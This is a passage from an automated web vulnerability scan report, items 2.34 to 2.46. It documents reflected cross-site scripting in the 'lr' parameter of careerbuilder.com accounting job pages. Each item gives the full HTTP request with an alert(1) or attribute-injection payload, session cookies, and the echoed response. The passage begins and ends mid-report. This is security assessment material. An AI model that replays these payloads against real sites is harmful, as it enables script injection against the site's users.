CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa3f293'-alert(1)-'786db9e58ce&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.34. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CPA.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_CPA.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7a16"%20a%3db%20a8d8796ad8c was submitted in the lr parameter. This input was echoed as e7a16" a=b a8d8796ad8c in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_CPA.htm?IPath=OCP&lr=cbcb_mhf48aae7a16"%20a%3db%20a8d8796ad8c HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189156
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_cpa.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL9
Date: Sun, 14 Nov 2010 23:22:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aae7a16" a=b a8d8796ad8c" />
...[SNIP]...

2.35. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Consulting.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Consulting.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54425'-alert(1)-'69e07ba1259 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_Consulting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a554425'-alert(1)-'69e07ba1259&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197774
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_consulting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR41
Date: Sun, 14 Nov 2010 23:09:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a554425'-alert(1)-'69e07ba1259&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.36. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Consulting.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Consulting.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42478"%20a%3db%203a96f68a939 was submitted in the lr parameter. This input was echoed as 42478" a=b 3a96f68a939 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Consulting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a542478"%20a%3db%203a96f68a939&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197180
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_consulting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR15
Date: Sun, 14 Nov 2010 23:06:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa'-alert(1)-'9d78db8d0a542478" a=b 3a96f68a939" />
...[SNIP]...

2.37. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CostAccounting.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_CostAccounting.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a9d2"%20a%3db%20c76e3eed769 was submitted in the lr parameter. This input was echoed as 7a9d2" a=b c76e3eed769 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_CostAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a57a9d2"%20a%3db%20c76e3eed769&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196950
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_costaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL20
Date: Sun, 14 Nov 2010 23:22:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa'-alert(1)-'9d78db8d0a57a9d2" a=b c76e3eed769" />
...[SNIP]...

2.38. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CostAccounting.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_CostAccounting.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c60b1'-alert(1)-'078d4fa7612 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_CostAccounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c60b1'-alert(1)-'078d4fa7612&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197631
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_costaccounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL35
Date: Sun, 14 Nov 2010 23:23:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c60b1'-alert(1)-'078d4fa7612&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.39. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Executive.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Executive.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3df9'-alert(1)-'57eee3b2f1c was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_Executive.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5a3df9'-alert(1)-'57eee3b2f1c&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197519
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_executive.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL11
Date: Sun, 14 Nov 2010 23:23:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5a3df9'-alert(1)-'57eee3b2f1c&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.40. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Executive.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Executive.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c20e1"%20a%3db%2003b3bbde943 was submitted in the lr parameter. This input was echoed as c20e1" a=b 03b3bbde943 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Executive.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c20e1"%20a%3db%2003b3bbde943&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196781
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_executive.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL24
Date: Sun, 14 Nov 2010 23:22:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c20e1" a=b 03b3bbde943" />
...[SNIP]...

2.41. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Management.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Management.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56b3d'-alert(1)-'9ff60971f08 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_Management.htm?IPath=OCP&lr=cbcb_mhf48aa56b3d'-alert(1)-'9ff60971f08 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190195
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_management.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL27
Date: Sun, 14 Nov 2010 23:24:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa56b3d'-alert(1)-'9ff60971f08&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.42. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Management.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Management.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69413"%20a%3db%20317ba7aab6a was submitted in the lr parameter. This input was echoed as 69413" a=b 317ba7aab6a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Management.htm?IPath=OCP&lr=cbcb_mhf48aa69413"%20a%3db%20317ba7aab6a HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189577
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_management.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL25
Date: Sun, 14 Nov 2010 23:23:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa69413" a=b 317ba7aab6a" />
...[SNIP]...

2.43. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Payroll.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Payroll.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2848d'-alert(1)-'7bd88549adc was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_Payroll.htm?IPath=OCP&lr=cbcb_mhf48aa2848d'-alert(1)-'7bd88549adc HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189967
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_payroll.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL32
Date: Sun, 14 Nov 2010 23:24:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa2848d'-alert(1)-'7bd88549adc&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.44. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Payroll.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Payroll.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a36e"%20a%3db%20771cc9e4121 was submitted in the lr parameter. This input was echoed as 9a36e" a=b 771cc9e4121 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Payroll.htm?IPath=OCP&lr=cbcb_mhf48aa9a36e"%20a%3db%20771cc9e4121 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189396
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_payroll.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL10
Date: Sun, 14 Nov 2010 23:24:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa9a36e" a=b 771cc9e4121" />
...[SNIP]...

2.45. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Reporting.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Reporting.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9b54"%20a%3db%204c9a7198dfe was submitted in the lr parameter. This input was echoed as c9b54" a=b 4c9a7198dfe in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Reporting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c9b54"%20a%3db%204c9a7198dfe&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196881
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_reporting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL18
Date: Sun, 14 Nov 2010 23:24:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c9b54" a=b 4c9a7198dfe" />
...[SNIP]...

2.46. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Reporting.htm [lr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Reporting.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c58e6'-alert(1)-'45be1a04315 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_Reporting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c58e6'-alert(1)-'45be1a04315&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197499
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
